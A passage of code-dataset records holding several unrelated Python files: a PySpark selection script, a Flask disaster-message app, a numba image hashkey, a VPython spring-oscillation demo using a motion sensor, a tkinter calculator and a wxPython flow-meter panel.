\\\n\t\t\t.select(self.visitor_table.sessionnumber \\\n\t\t\t\t\t, func.upper(self.visitor_table.profileuiid).alias(\"profileuiid\")) \\\n\t\t\t.distinct()\n\t\t#print(\"visitor\",visitor_table_unique_target.count())\n\t\t#print(\"visitor\",visitor_table_unique_target.count())\n\n\t\tfinal_targets = visitor_table_unique_target \\\n\t\t\t.join(final_targets \\\n\t\t\t\t, visitor_table_unique_target.profileuiid == final_targets.aftlnr \\\n\t\t\t\t, 'inner')\n\t\t#print(\"final2\",final_targets.count())\n\t\t#print(\"final2\",final_targets.count())\n\n\t\tfinal_targets_corrected = final_targets \\\n\t\t\t.select(final_targets.sessionnumber \\\n\t\t\t\t\t, final_targets.profileuiid.alias(\"aftlnr\")\n\t\t\t\t\t, final_targets.knid\n\t\t\t\t\t, final_targets.customer_age.alias(\"target\"))\n\t\t#print(\"final3\",final_targets_corrected.count())\n\t\t#print(\"final3\",final_targets_corrected.count())\n\n\t\treturn final_targets_corrected\n","sub_path":"bib/data_selection/ds_test.py","file_name":"ds_test.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"471437083","text":"# https://www.codewars.com/kata/5b18e9e06aefb52e1d0001e9\ndef riders(st):\n s = 0\n count = 1\n i = 0\n while i < len(st):\n s += st[i]\n if s > 100:\n count += 1\n s = 0\n else:\n i += 1\n return count","sub_path":"The Pony Express.py","file_name":"The Pony Express.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484197213","text":"import json\nimport plotly\nimport pandas as pd\nimport re\nfrom collections import Counter\n\nfrom disasterapp import app\nimport json, plotly\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Bar\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\nfrom disasterapp.tokenizer_function import tokenize_only_english\nfrom util_scripts.tokenizer_function import tokenize, Tokenizer\nfrom util_scripts import tokenizer_function\n\n\n@app.before_first_request\ndef load_model_data():\n global df\n global model\n # load data\n\n engine = create_engine('sqlite:///../data/DisasterResponse.db')\n df = pd.read_sql_table('DisasterResponse', engine)\n model = joblib.load(\"../models/classifier_me.pkl\")\n\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # extract data needed for visuals\n # Message counts of different generes\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n genre_counts = genre_counts.to_list()\n\n # Message counts for different categories\n cate_counts_df = df.iloc[:, 4:].sum().sort_values(ascending=False)\n cate_counts = list(cate_counts_df)\n cate_names = list(cate_counts_df.index)\n\n # Top keywords in Social Media in percentages\n social_media_messages = ' '.join(df[df['genre'] == 'social']['message'])\n social_media_tokens = tokenize_only_english(social_media_messages)\n\n # social_media_tokens = tokenize(social_media_messages)\n social_media_wrd_counter = Counter(social_media_tokens).most_common()\n\n items, counts = zip(*social_media_wrd_counter)\n word_frequency = pd.Series(counts, index=items) / sum(counts) * 100\n social_media_wrds = word_frequency.index[:50].to_list()\n social_media_wrd_pct = word_frequency[:50].to_list()\n\n\n # direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\n #\n # direct_tokens = tokenize_only_english(direct_messages)\n # # social_media_tokens = tokenize(social_media_messages)\n # direct_wrd_counter = Counter(direct_tokens).most_common()\n #\n # items, counts = zip(*direct_wrd_counter)\n # word_frequency = pd.Series(counts, index=items) / sum(counts) * 100\n # direct_wrds = word_frequency.index[:50].to_list()\n # direct_wrd_pct = word_frequency[:50].to_list()\n\n # Top keywords in Direct in percentages\n direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\n direct_tokens = tokenize(direct_messages)\n direct_wrd_counter = Counter(direct_tokens).most_common()\n direct_wrd_cnt = [i[1] for i in direct_wrd_counter]\n direct_wrd_pct = [i / sum(direct_wrd_cnt) * 100 for i in direct_wrd_cnt]\n direct_wrds = [i[0] for i in direct_wrd_counter]\n # create visuals\n\n graphs = [\n # Histogram of the message genere\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n # histogram of social media messages top 30 keywords\n {\n 'data': [\n Bar(\n x=social_media_wrds[:50],\n y=social_media_wrd_pct[:50]\n )\n ],\n\n 'layout': {\n 'title': \"Top 50 Keywords in Social Media Messages\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"% Total Social Media Messages\"\n }\n }\n },\n\n # histogram of direct messages top 30 keywords\n {\n 'data': [\n Bar(\n x=direct_wrds[:50],\n y=direct_wrd_pct[:50]\n )\n ],\n\n 'layout': {\n 'title': \"Top 50 Keywords in Direct Messages\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"% Total Direct Messages\"\n }\n }\n },\n\n # histogram of messages categories distributions\n {\n 'data': [\n Bar(\n x=cate_names,\n y=cate_counts\n )\n ],\n\n 'layout': {\n 'title': \"Distribution of Message Categories\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"count\"\n }\n }\n },\n\n ]\n\n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '')\n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file.\n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n","sub_path":"app/disasterapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604957147","text":"import numpy as np\nfrom math import atan2, floor, pi\nfrom numba import njit, prange\n\n\ndef hashkey(block, Qangle, W):\n # Calculate gradient\n gy, gx = np.gradient(block)\n return _hashkey(gx,gy,Qangle,W)\n\n@njit\ndef _hashkey(gx,gy,Qangle,W):\n # Transform 2D matrix into 1D array\n gx = gx[1:-1,1:-1].ravel()\n gy = gy[1:-1,1:-1].ravel()\n\n # SVD calculation\n G = np.vstack((gx,gy)).T\n GTWG = G.T.dot(W).dot(G)\n w, v = np.linalg.eig(GTWG)\n\n # Make sure V and D contain only real numbers\n w = np.real(w)\n v = np.real(v)\n\n # Sort w and v according to the descending order of w\n idx = w.argsort()[::-1]\n w = w[idx]\n v = v[:,idx]\n\n # Calculate theta\n theta = atan2(v[1,0], v[0,0])\n if theta < 0:\n theta = theta + pi\n\n # Calculate lamda\n lamda = w[0]\n\n # Calculate u\n sqrtlamda1 = np.sqrt(w[0])\n sqrtlamda2 = np.sqrt(w[1])\n if sqrtlamda1 + sqrtlamda2 == 0:\n u = 0\n else:\n u = (sqrtlamda1 - sqrtlamda2)/(sqrtlamda1 + sqrtlamda2)\n\n # Quantize\n angle = floor(theta/pi*Qangle)\n if lamda < 0.0001:\n strength = 0\n elif lamda > 0.001:\n strength = 2\n else:\n strength = 1\n if u < 0.25:\n coherence = 0\n elif u > 0.5:\n coherence = 2\n else:\n coherence = 1\n\n # Bound the output to the desired ranges\n if angle > Qangle-1:\n angle = Qangle-1\n elif angle < 0:\n angle = 0\n\n return angle, strength, coherence, theta, lamda, u\n","sub_path":"hashkey.py","file_name":"hashkey.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"250907978","text":"'''\r\nUse the Go Direct Motion Detector (GDX-MD) to record the oscillations of a mass\r\non a spring. Compare measured data to modeled data. Vpython is used to give a \r\n3D visual representation of both the measured and modeled data.\r\n\r\nThis example assumes the Go Direct Motion Sensor is connected via USB, change to Bluetooth\r\nas needed in the code below.\r\n\r\nLook closely at the Experimental Setup Variables section below to modify variables, as needed.\r\n\r\n'''\r\n\r\nimport os\r\nimport sys\r\n\r\n# This allows us to import the local gdx module that is up one directory\r\ngdx_module_path = os.path.abspath(os.path.join('.'))\r\n# If the module is not found, uncomment and try two dots. Also, uncomment the print(sys.path)\r\n#gdx_module_path = os.path.abspath(os.path.join('..'))\r\nif gdx_module_path not in sys.path:\r\n sys.path.append(gdx_module_path)\r\n\r\n# If there is an error trying to find the gdx module, uncomment this to see where\r\n# the program is looking to find the gdx folder\r\n#print(sys.path)\r\n\r\nfrom gdx import gdx \r\ngdx = gdx.gdx()\r\n\r\nfrom vpython import *\r\nimport math\r\n\r\n#Vpython Canvas\r\nscene = canvas(title='Simple Harmonic Oscillation',align = \"left\", center=vector(0,30,0))\r\nscene.caption = ' Click Record for Data Collection'\r\nscene.append_to_caption('\\n\\n', ' ')\r\nscene.width = 300\r\nscene.height = 500\r\n\r\n#Experimental Setup Variables\r\n'''An easy way to get the starting_spring_postion value is to measure the distance using the motion detector.\r\nTo do this, run the program without the mass oscillating and click the Record button to take measurements. \r\nYou want the Vpython graph to have a plot with a 0 amplitude. If it is not 0 then look at the measurements \r\nthat are printed to the terminal. Use those measurements to determine the starting_spring_position value'''\r\ntmax = 10 #duration to take measurements from the motion detector (seconds)\r\nstarting_spring_position = 35.56 #equilibrium position - distance from detector to bottom of mass when hanging without oscillating (cm)\r\nspring_equilibrium_length = 21 #length of spring with mass hanging\r\nk=6 # spring constant starting value. A Vpython slider is created to adjust this value when running the program. \r\n# (note theoretical T = 2 pi SQR(mass/k); I measured as about 0.8N/0.154cm = 5.1 N/m)\r\n\r\n\r\n#Variables\r\nspring_stretch_model = 0 #variable to store location of spring in the model\r\nmax_stretch = 0\r\ntime_at_max_stretch = 0\r\nindex_at_max_stretch = 0\r\nactual_list = []\r\n\r\n\r\n#Vpython Configuration:\r\nbase_actual = box(pos=vector(0,0,0), size=vector(30,2,20), color=color.yellow)\r\nrod_actual = cylinder(pos=vector(base_actual.pos.x-5,0,0), axis=vector(0,65,0), radius=1, color=color.blue)\r\ntop_support_actual = cylinder(pos=vector(rod_actual.pos.x-5,rod_actual.axis.y-5,0), axis=vector(25,0,0), radius=1, color=color.blue)\r\nspring_actual = helix(pos=vector(top_support_actual.pos), axis=vector(0,-spring_equilibrium_length,0), coils=20, radius=1)\r\nspring_actual.axis.y = -spring_equilibrium_length\r\nspring_actual.pos.x = top_support_actual.pos.x + top_support_actual.axis.x/1.25\r\nspring_actual.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\nmass_actual = cylinder(pos=vector(spring_actual.pos), axis =vector(0,-8,0), radius = 3, color=color.blue, opacity=1)\r\nmass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length\r\nmotiondetector = box(pos=vector(mass_actual.pos.x,4,0), size=vector(6,6,6), color=color.gray(0.5))\r\nmotiondetector_foil = cylinder(pos=vector(motiondetector.pos), axis =vector(0,3.1,0), radius = 2, color=color.white)\r\nspring_model = helix(pos=vector(top_support_actual.pos), axis=vector(0,-spring_equilibrium_length,0), coils=20, radius=1)\r\nspring_model.axis.y = -spring_equilibrium_length\r\nspring_model.pos.x = top_support_actual.pos.x + top_support_actual.axis.x/2\r\nspring_model.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\nmass_model = cylinder(pos=vector(spring_model.pos), axis =vector(0,-8,0), radius = 3, color=color.red, opacity=1)\r\nmass_model.pos.y = spring_model.pos.y-spring_equilibrium_length\r\nmass_model.mass = 0.1 # mass hung on the spring(kg)\r\nmass_model.p = 0 # initial momentum of mass (kg*m/s)\r\n\r\n\r\n#Vpython graph:\r\npos_graph=graph(title= \"position vs time\", xmin=0, xmax=tmax, ymin=-5, ymax=5, align='right')\r\npos_graph.width = 800\r\npos_graph.height = 500\r\nmodel_data=gcurve(color=color.red)\r\nactual_data=gcurve(color=color.blue)\r\nmodel_data.plot(0,0) \r\nactual_data.plot(0,0)\r\nmodel_data.delete()\r\nactual_data.delete()\r\n\r\n\r\nscene.autoscale = False\r\n\r\n\r\ngdx.open_usb()\r\n#gdx.open_ble()\r\n\r\ngdx.select_sensors([5]) #use the motion detector distance channel only. This is channel 5\r\n\r\n\r\n##############################\r\n# A record button is created. Use it to take live measurements from the Motion Detector\r\n##############################\r\ndef Record(r):\r\n\r\n model_data.delete() #clear the graph\r\n actual_data.delete()\r\n\r\n global time_at_max_stretch #these variables will be used to pass the info to the Model function\r\n global index_at_max_stretch\r\n global actual_list\r\n global max_stretch\r\n global dt\r\n \r\n spring_stretch_actual = 0 \r\n max_stretch = 0\r\n i=0\r\n t = 0.0\r\n dt = 0.05 #note gdx.start below where it sets the sampling period to 100ms (or 0.1 seconds)\r\n \r\n time_at_max_stretch = 0\r\n index_at_max_stretch = 0\r\n actual_list = []\r\n\r\n #gdx.start(period=50) #start data collection\r\n gdx.start(period = (dt*1000))\r\n \r\n while t < tmax + dt: #use the loop to read the data\r\n \r\n measurements = gdx.read() #returns a list of measurements from the sensors selected.\r\n if measurements == None: \r\n break \r\n print('distance (cm) = ', measurements[0]*100)\r\n spring_stretch_actual = measurements[0]*100 - starting_spring_position\r\n spring_actual.axis.y = -spring_equilibrium_length + spring_stretch_actual\r\n mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length + spring_stretch_actual\r\n actual_data.plot(t,spring_stretch_actual)\r\n actual_list.append(spring_stretch_actual) #create a list of all the measurements. Store in a variable to send to the Model function\r\n \r\n if spring_stretch_actual>max_stretch: #Capture the biggest stretch. Store in variables to send to the Model function\r\n max_stretch=spring_stretch_actual\r\n time_at_max_stretch = t\r\n index_at_max_stretch = i\r\n \r\n t = t + dt\r\n i = i + 1\r\n gdx.stop() \r\nbutton( bind=Record, text='Record', pos=scene.caption_anchor)\r\n\r\n\r\n##############################\r\n# A Model button is created. Use it to plot the model data and the saved measurements from Record\r\n##############################\r\ndef model(m):\r\n global actual_list\r\n print (\"len of list at beginning = \", len(actual_list))\r\n print('\\n\\n')\r\n\r\n actual_list_for_model = []\r\n spring_model.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\n mass_model.pos.y = spring_model.pos.y-spring_equilibrium_length\r\n spring_model.axis.y = -spring_equilibrium_length\r\n spring_actual.pos.y = top_support_actual.pos.y - top_support_actual.radius\r\n mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length\r\n spring_actual.axis.y = -spring_equilibrium_length\r\n model_data.delete()\r\n actual_data.delete()\r\n print('model actual list =', actual_list)\r\n print('\\n\\n')\r\n print (\"len of list = \", len(actual_list))\r\n print('\\n\\n')\r\n actual_list_for_model = list(actual_list)\r\n i=0\r\n del actual_list_for_model[0:index_at_max_stretch]\r\n print (\"len of list after del = \", len(actual_list))\r\n print('\\n\\n')\r\n print (\"len of model after del = \", len(actual_list_for_model))\r\n print('\\n\\n')\r\n\r\n t = time_at_max_stretch\r\n spring_stretch_model = max_stretch\r\n print('spring stretch model =', spring_stretch_model)\r\n print('\\n\\n')\r\n #dt = 0.05\r\n print('k = ', k)\r\n print('\\n\\n')\r\n mass_model.p = 0\r\n\r\n while t < tmax + dt:\r\n rate(10)\r\n actual_data.plot(t,actual_list_for_model[i])\r\n model_data.plot(t,spring_stretch_model)\r\n\r\n Fe = k*(spring_stretch_model)*-1 # forces acting on the system (elastic force)\r\n mass_model.p = mass_model.p + Fe*dt # update the momentum\r\n spring_stretch_model = spring_stretch_model + (mass_model.p/mass_model.mass)*dt\r\n\r\n spring_actual.axis.y = -spring_equilibrium_length + actual_list_for_model[i]\r\n spring_model.axis.y = -spring_equilibrium_length + spring_stretch_model\r\n mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length + actual_list_for_model[i]\r\n mass_model.pos.y = spring_model.pos.y-spring_equilibrium_length + spring_stretch_model \r\n \r\n t = t + dt\r\n i = i + 1\r\nbutton( bind=model, text='Model', pos=scene.caption_anchor)\r\n\r\n##############################\r\n# An Exit button is created. Use it to close the USB connection\r\n##############################\r\ndef exit(e):\r\n gdx.close()\r\nbutton( bind=exit, text='EXIT', color=color.red, pos=scene.caption_anchor)\r\nscene.append_to_caption('\\n\\n')\r\n\r\n##############################\r\n'''\r\nA slider is created. Use it to modify the spring constant. The function specified by \"bind\" is \r\ncalled when the user drags the slider. In this case, the function S is called. This function\r\nupdates the variable \"k\" with the value of the slider and updates the variable \"wt\" with new text.\r\n'''\r\n##############################\r\ndef S(s): # this is the function that is called when the slider is changed.\r\n print(s.value)\r\n global k #the k value is modified by the slider and used in the model function\r\n k = s.value\r\n wt.text = 'spring constant k = {:1.2f}'.format(s.value)\r\nsl = slider(min=0, max=10, value=k, length=200, bind=S, left=20) #when the slider is changed, the function S is called using \"bind = S\"\r\n#scene.append_to_caption('\\n\\n')\r\nscene.append_to_caption(' ')\r\n\r\nwt = wtext(text='spring constant k = {:1.2f}'.format(k))\r\nscene.append_to_caption('\\n\\n')\r\n\r\n##############################\r\n# A second slider is created. Use it to modify the start position (distance from top of MD to bottom of weight)\r\n##############################\r\ndef R(r): \r\n print(r.value)\r\n global starting_spring_position #the k value is modified by the slider and used in the model function\r\n starting_spring_position = r.value\r\n rt.text = 'start position = {:1.2f}'.format(r.value)\r\nslsl = slider(min=30, max=40, value=starting_spring_position, length=200, bind=R, left=20)\r\nscene.append_to_caption(' ')\r\n\r\nrt = wtext(text='start positions = {:1.2f}'.format(starting_spring_position))\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"python/advanced_examples/simple_harmonic_oscillator.py","file_name":"simple_harmonic_oscillator.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34091494","text":"#simple calculator\n#Author = kngsley okpara\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom math import *\n\n\nexpression = \" \"\n\nx = int()\ny = int()\n\ndef press(num):\n global expression\n expression = expression + str(num)\n equation.set(expression)\ndef equalpress():\n try:\n global expression\n total = str(eval(expression))\n equation.set(total)\n expression = \" \"\n except:\n equation.set(\"error\")\n expression = \" \"\ndef clear():\n global expression\n expression = \" \"\n equation.set(\" \")\n\n\n\nif __name__ == \"__main__\":\n\n root = Tk()\n\n root.title(\"KINGS CALC\")\n\n frame = Frame(root)\n\n\n\n menubar = Menu(root)\n filemenu = Menu(menubar)\n filemenu.add_command(label=\"Scientific\", command=lambda:press(5))\n filemenu.add_separator()\n filemenu.add_command(label=\"Statistics\", command=lambda:press(6))\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\",command=root.destroy)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n root.config(menu=menubar)\n\n\n\n frame.configure(background=\"light green\")\n\n equation = StringVar()\n \n\n expression_field = Entry(frame, textvariable=equation, bg = \"white\", bd = 33, insertwidth = 9, width = 40,)\n expression_field.grid(row=0, columnspan=7)\n\n equation.set('calculate here')\n\n \"\"\"#calculation area\n calc_area = Entry(root)\n calc_area.pack(side=TOP, fill=X, )\"\"\"\n\n \n\n #num is the short form of number, while sym is the short form of symbol\n clear_all = Button(frame,font=('Script MT Bold',20),text='CE',width=4,height=1,command=clear, bg=\"blue\", bd=14).grid(row=0,column=1)\n clear = Button(frame,font=('Script MT Bold',20),text='X^',width=4,height=1,command=pow(x, y),bd=14).grid(row=0,column=5)\n num7 = Button(frame,font=('Script MT Bold',20),text='7',width=4,height=2,command=lambda:press(7),bg=\"Gold\",bd=14).grid(row=1,column=1)\n num8 = Button(frame,font=('Script MT Bold',20),text='8',width=4,height=2,command=lambda:press(8),bg=\"Gold\",bd=14).grid(row=1,column=2, sticky=W)\n num9 = Button(frame,font=('Script MT Bold',20),text='9',width=4,height=2,command=lambda:press(9),bg=\"Gold\",bd = 14).grid(row=1,column=3)\n num4 = Button(frame,font=('Script MT Bold',20),text='4',width=4,height=2,command=lambda:press(4),bg=\"Gold\",bd=14).grid(row=2,column=1)\n num5 = Button(frame,font=('Script MT Bold',20),text='5',width=4,height=2,command=lambda:press(5),bg=\"Gold\",bd=14).grid(row=2,column=2)\n num6 = Button(frame,font=('Script MT Bold',20),text='6',width=4,height=2,command=lambda:press(6),bg=\"Gold\",bd=14).grid(row=2,column=3)\n num1 = Button(frame,font=('Script MT Bold',20),text='1',width=4,height=2,command=lambda:press(1),bg=\"Gold\",bd=14).grid(row=3,column=1)\n num2 = Button(frame,font=('Script MT Bold',20),text='2',width=4,height=2,command=lambda:press(2),bg=\"Gold\",bd=14).grid(row=3,column=2)\n num3 = Button(frame,font=('Script MT Bold',20),text='3',width=4,height=2,command=lambda:press(3),bg=\"Gold\",bd=14).grid(row=3,column=3)\n num0 = Button(frame,font=('Script MT Bold',20),text='0',width=4,height=2,command=lambda:press(0),bg=\"Gold\",bd=14).grid(row=4,column=2)\n plusminus = Button(frame,font=('Script MT Bold',20),text='±',width=4,height=2,command=lambda:press('-'),bd=14).grid(row=4,column=3)\n symdot = Button(frame,font=('Script MT Bold',20),text='.',width=4,height=2,command=lambda:press('.'),bd=14).grid(row=4,column=1)\n symequal = Button(frame,font=('Script MT Bold',20),text='=',width=4,height=2,command=equalpress,bd=14).grid(row=4,column=5)\n symplus = Button(frame,font=('Script MT Bold',20),text='+',width=4,height=2,command=lambda:press('+'),bd=14).grid(row=4,column=4)\n symminus = Button(frame,font=('Script MT Bold',20),text='-',width=4,height=2,command=lambda:press('-'),bd=14).grid(row=3,column=4)\n sympercent = Button(frame,font=('Script MT Bold',20),text='%',width=4,height=2,command=lambda:press('/100'),bd=14).grid(row=3,column=5)\n symdivide = Button(frame,font=('Script MT Bold',20),text='÷',width=4,height=2,command=lambda:press('/'),bd=14).grid(row=2,column=5)\n symmultiply = Button(frame,font=('Script MT Bold',20),text='×',width=4,height=2,command=lambda:press('*'),bd=14).grid(row=2,column=4)\n symsquare = Button(frame,font=('Script MT Bold',20),text='ײ',width=4,height=2,command=lambda:press('**2'),bd=14).grid(row=1,column=4)\n symsquareroot=Button(frame,font=('Script MT Bold',20),text='√',width=4,height=2,command=lambda:press('**0.5'),bd=14).grid(row=1,column=5)\n\n #Author button\n author = Button(frame, text='Author', width=68, command=lambda:press('Kingsley')).grid(row=5, columnspan=7)\n\n\nframe.pack()\n\nroot.mainloop()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"388683270","text":"#-------------------------------------------------------------------------\n# Flow Meter Panel\n''' author: Jeff Peery '''\n# date: 02/23/2011\n# email: JeffPeery@yahoo.com\n#-------------------------------------------------------------------------\n\n#----------------------------------------------------------------------\n# Revision Log\n#\n# Rev Date Author Description \n#----------------------------------------------------------------------\n# 1.01 2013/01/25 SPN Updated static box diagram to current layout\n# Widen sizer2 box to accomodate longer type label\n\n#-------------------------------------------------------------------------\n# MODULES\n#-------------------------------------------------------------------------\nimport os\nimport types\nimport string\nimport wx\nimport MODULES.myPlot as myPlot\nimport MODULES.myHeader as myHeader\nimport MODULES.myPlot as myPlot\nimport MODULES.myUtil as myUtil\n\n#-------------------------------------------------------------------------\n# Constants\n#-------------------------------------------------------------------------\n\nclass Panel(wx.Panel):\n def __init__(self, parent, num_axes=1):\n wx.Panel.__init__(self, parent=parent)\n self.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n #----------------------------------\n # Attributes\n #----------------------------------\n self.parent = parent\n\n #----------------------------------\n # GUI Ctrl Definitions\n #----------------------------------\n self.labels_panel = wx.Panel(parent=self, size=wx.Size(100, 100), style=0)\n self.class_label = wx.StaticText(label='Class: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.class_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.product_label = wx.StaticText(label='Type: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.product_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.serial_num_label = wx.StaticText(label='Serial #: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.serial_num_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.meter_size_label = wx.StaticText(label='Size: (in)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.meter_size_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.software_rev_label = wx.StaticText(label='Rev: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.software_rev_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.nom_k_label = wx.StaticText(label='Nominal K: (ppg)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.nom_k_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.k_label = wx.StaticText(label='K: (ppg)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.k_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.fsadc_label = wx.StaticText(label='FSADC: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.fsadc_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.zradc_label = wx.StaticText(label='ZRADC: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.zradc_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.AO_label = wx.StaticText(label='AO: (mA)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.AO_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.rate_unit_label = wx.StaticText(label='Rate Unit: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.total_unit_label = wx.StaticText(label='Total Unit: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n \n self.figure = myPlot.Figure(self, num_axes=num_axes)\n \n #----------------------------------\n # GUI Sizers\n #----------------------------------\n '''Sizer layout'''\n # Panel\n # -----static box-----------------------------------------\n # |-------------------------------------------------------------------------------------------------|\n # | 1|\n # | |---------------------------------------------------------------------------------------------| |\n # | | 4| |\n # | | |-----------------------------------------------------------------------------------------| | |\n # | | | 8| | |\n # | | | |-------------------| |-------------------| |-------------------| |-------------------| | | |\n # | | | | class label 2| | meter size 3| | rev 6| | ao 7| | | |\n # | | | | product label | | rate | | nominal k | | fsadc | | | |\n # | | | | serial # | | total | | K | | zradc | | | |\n # | | | |-------------------| |-------------------| |-------------------| |-------------------| | | |\n # | | |-----------------------------------------------------------------------------------------| | |\n # | |---------------------------------------------------------------------------------------------| |\n # | |\n # | |---------------------------------------------------------------------------------------------| |\n # | |figure 5| |\n # | | | |\n # | | | |\n # | | | |\n # | |---------------------------------------------------------------------------------------------| |\n # |-------------------------------------------------------------------------------------------------|\n # status bar\n #\n self.sizer1 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer2 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer3 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer4 = wx.BoxSizer(orient=wx.HORIZONTAL)\n self.sizer5 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer6 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer7 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer8 = wx.BoxSizer(orient=wx.HORIZONTAL)\n \n self.sizer1.Add(self.sizer4, 0, border=0, flag=wx.EXPAND) \n self.sizer1.Add(self.sizer5, 1, border=0, flag=wx.EXPAND)\n\n self.sizer4.Add(self.labels_panel, 1, border=0, flag=wx.EXPAND)\n self.labels_panel.SetSizer(self.sizer8)\n \n self.sizer8.Add(self.sizer2, 3, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer3, 2, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer6, 2, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer7, 2, border=0, flag=wx.EXPAND)\n \n self.sizer5.Add(self.figure, 1, border=myHeader.CTRL_SPACING, flag=wx.EXPAND | wx.ALL)\n\n 